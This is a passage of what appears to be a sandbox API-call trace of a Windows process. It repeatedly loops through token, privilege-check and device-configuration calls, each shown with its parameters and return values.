pHWProfileInfo=0x0) returned 0x3 [0084.734] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.734] GetCurrentThread () returned 0xfffffffe [0084.734] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.734] GetLastError () returned 0x3f0 [0084.734] GetCurrentProcess () returned 0xffffffff [0084.734] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.734] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.734] SetLastError (dwErrCode=0x522) [0084.734] CloseHandle (hObject=0x114) returned 1 [0084.734] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.734] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.734] GetLastError () returned 0x578 [0084.734] SetLastError (dwErrCode=0x578) [0084.734] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.734] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.734] GetCurrentThread () returned 0xfffffffe [0084.734] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.734] GetLastError () returned 0x3f0 [0084.734] GetCurrentProcess () returned 0xffffffff [0084.734] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.734] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.734] SetLastError (dwErrCode=0x522) [0084.734] CloseHandle (hObject=0x114) returned 1 [0084.734] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.734] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.734] GetLastError () returned 0x578 [0084.734] SetLastError (dwErrCode=0x578) [0084.734] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.734] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.735] GetCurrentThread () returned 0xfffffffe [0084.735] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.735] GetLastError () returned 0x3f0 [0084.735] GetCurrentProcess () returned 0xffffffff [0084.735] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.735] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.735] SetLastError (dwErrCode=0x522) [0084.735] CloseHandle (hObject=0x114) returned 1 [0084.735] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.735] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.735] GetLastError () returned 0x578 [0084.735] SetLastError (dwErrCode=0x578) [0084.735] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.735] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.735] GetCurrentThread () returned 0xfffffffe [0084.735] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.735] GetLastError () returned 0x3f0 [0084.735] GetCurrentProcess () returned 0xffffffff [0084.735] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.735] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.735] SetLastError (dwErrCode=0x522) [0084.735] CloseHandle (hObject=0x114) returned 1 [0084.735] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.735] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.735] GetLastError () returned 0x578 [0084.735] SetLastError (dwErrCode=0x578) [0084.735] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.735] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.735] GetCurrentThread () returned 0xfffffffe [0084.735] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.735] GetLastError () returned 0x3f0 [0084.735] GetCurrentProcess () returned 0xffffffff [0084.735] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.735] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.735] SetLastError (dwErrCode=0x522) [0084.735] CloseHandle (hObject=0x114) returned 1 [0084.735] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.735] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.735] GetLastError () returned 0x578 [0084.735] SetLastError (dwErrCode=0x578) [0084.735] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.735] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.735] GetCurrentThread () returned 0xfffffffe [0084.735] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.735] GetLastError () returned 0x3f0 [0084.735] GetCurrentProcess () returned 0xffffffff [0084.736] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.736] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.736] SetLastError (dwErrCode=0x522) [0084.736] CloseHandle (hObject=0x114) returned 1 [0084.736] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.736] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.736] GetLastError () returned 0x578 [0084.736] SetLastError (dwErrCode=0x578) [0084.736] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.736] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.736] GetCurrentThread () returned 0xfffffffe [0084.736] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.736] GetLastError () returned 0x3f0 [0084.736] GetCurrentProcess () returned 0xffffffff [0084.736] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.736] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.736] SetLastError (dwErrCode=0x522) [0084.736] CloseHandle (hObject=0x114) returned 1 [0084.736] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.736] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.736] GetLastError () returned 0x578 [0084.736] SetLastError (dwErrCode=0x578) [0084.736] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.736] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.736] GetCurrentThread () returned 0xfffffffe [0084.736] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.736] GetLastError () returned 0x3f0 [0084.736] GetCurrentProcess () returned 0xffffffff [0084.736] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.736] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.736] SetLastError (dwErrCode=0x522) [0084.736] CloseHandle (hObject=0x114) returned 1 [0084.736] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.736] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.737] GetLastError () returned 0x578 [0084.737] SetLastError (dwErrCode=0x578) [0084.737] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.737] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.737] GetCurrentThread () returned 0xfffffffe [0084.737] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.737] GetLastError () returned 0x3f0 [0084.737] GetCurrentProcess () returned 0xffffffff [0084.737] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.737] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.737] SetLastError (dwErrCode=0x522) [0084.737] CloseHandle (hObject=0x114) returned 1 [0084.737] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.737] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.737] GetLastError () returned 0x578 [0084.737] SetLastError (dwErrCode=0x578) [0084.737] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.737] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.737] GetCurrentThread () returned 0xfffffffe [0084.737] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.737] GetLastError () returned 0x3f0 [0084.737] GetCurrentProcess () returned 0xffffffff [0084.737] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.737] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.737] SetLastError (dwErrCode=0x522) [0084.737] CloseHandle (hObject=0x114) returned 1 [0084.737] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.737] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.737] GetLastError () returned 0x578 [0084.737] SetLastError (dwErrCode=0x578) [0084.737] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.737] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.737] GetCurrentThread () returned 0xfffffffe [0084.737] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.737] GetLastError () returned 0x3f0 [0084.737] GetCurrentProcess () returned 0xffffffff [0084.737] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.737] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.737] SetLastError (dwErrCode=0x522) [0084.738] CloseHandle (hObject=0x114) returned 1 [0084.738] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.738] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.738] GetLastError () returned 0x578 [0084.738] SetLastError (dwErrCode=0x578) [0084.738] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.738] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.738] GetCurrentThread () returned 0xfffffffe [0084.738] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.738] GetLastError () returned 0x3f0 [0084.738] GetCurrentProcess () returned 0xffffffff [0084.738] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.738] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.738] SetLastError (dwErrCode=0x522) [0084.738] CloseHandle (hObject=0x114) returned 1 [0084.738] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.738] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.738] GetLastError () returned 0x578 [0084.738] SetLastError (dwErrCode=0x578) [0084.738] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.738] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.738] GetCurrentThread () returned 0xfffffffe [0084.738] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.738] GetLastError () returned 0x3f0 [0084.738] GetCurrentProcess () returned 0xffffffff [0084.738] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.738] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.738] SetLastError (dwErrCode=0x522) [0084.738] CloseHandle (hObject=0x114) returned 1 [0084.738] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.738] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.738] GetLastError () returned 0x578 [0084.738] SetLastError (dwErrCode=0x578) [0084.738] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.738] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.738] GetCurrentThread () returned 0xfffffffe [0084.738] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.738] GetLastError () returned 0x3f0 [0084.738] GetCurrentProcess () returned 0xffffffff [0084.738] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.738] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.738] SetLastError (dwErrCode=0x522) [0084.738] CloseHandle (hObject=0x114) returned 1 [0084.738] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.739] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.739] GetLastError () returned 0x578 [0084.739] SetLastError (dwErrCode=0x578) [0084.739] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.739] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.739] GetCurrentThread () returned 0xfffffffe [0084.739] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.739] GetLastError () returned 0x3f0 [0084.739] GetCurrentProcess () returned 0xffffffff [0084.739] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.739] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.739] SetLastError (dwErrCode=0x522) [0084.739] CloseHandle (hObject=0x114) returned 1 [0084.739] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.739] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.739] GetLastError () returned 0x578 [0084.739] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.739] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.739] GetCurrentThread () returned 0xfffffffe [0084.739] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.739] GetLastError () returned 0x3f0 [0084.739] GetCurrentProcess () returned 0xffffffff [0084.739] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.739] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.739] SetLastError (dwErrCode=0x522) [0084.739] CloseHandle (hObject=0x114) returned 1 [0084.739] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.739] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.739] GetLastError () returned 0x578 [0084.739] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.739] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.739] GetCurrentThread () returned 0xfffffffe [0084.739] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.739] GetLastError () returned 0x3f0 [0084.739] GetCurrentProcess () returned 0xffffffff [0084.739] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.739] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.739] SetLastError (dwErrCode=0x522) [0084.739] CloseHandle (hObject=0x114) returned 1 [0084.739] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.739] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.739] GetLastError () returned 0x578 [0084.739] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.739] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.739] GetCurrentThread () returned 0xfffffffe [0084.739] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.740] GetLastError () returned 0x3f0 [0084.740] GetCurrentProcess () returned 0xffffffff [0084.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.740] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.740] SetLastError (dwErrCode=0x522) [0084.740] CloseHandle (hObject=0x114) returned 1 [0084.740] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.740] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.740] GetLastError () returned 0x578 [0084.740] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.740] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.740] GetCurrentThread () returned 0xfffffffe [0084.740] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.740] GetLastError () returned 0x3f0 [0084.740] GetCurrentProcess () returned 0xffffffff [0084.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.740] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.740] SetLastError (dwErrCode=0x522) [0084.740] CloseHandle (hObject=0x114) returned 1 [0084.740] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.740] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.740] GetLastError () returned 0x578 [0084.740] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.740] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.740] GetCurrentThread () returned 0xfffffffe [0084.740] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.740] GetLastError () returned 0x3f0 [0084.740] GetCurrentProcess () returned 0xffffffff [0084.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.740] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.740] SetLastError (dwErrCode=0x522) [0084.740] CloseHandle (hObject=0x114) returned 1 [0084.740] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.740] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.740] GetLastError () returned 0x578 [0084.740] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.740] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.740] GetCurrentThread () returned 0xfffffffe [0084.740] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.740] GetLastError () returned 0x3f0 [0084.740] GetCurrentProcess () returned 0xffffffff [0084.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.740] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.740] SetLastError (dwErrCode=0x522) [0084.740] CloseHandle (hObject=0x114) returned 1 [0084.740] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.740] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.741] GetLastError () returned 0x578 [0084.741] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.741] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.741] GetCurrentThread () returned 0xfffffffe [0084.741] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.741] GetLastError () returned 0x3f0 [0084.741] GetCurrentProcess () returned 0xffffffff [0084.741] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.741] PrivilegeCheck (in: 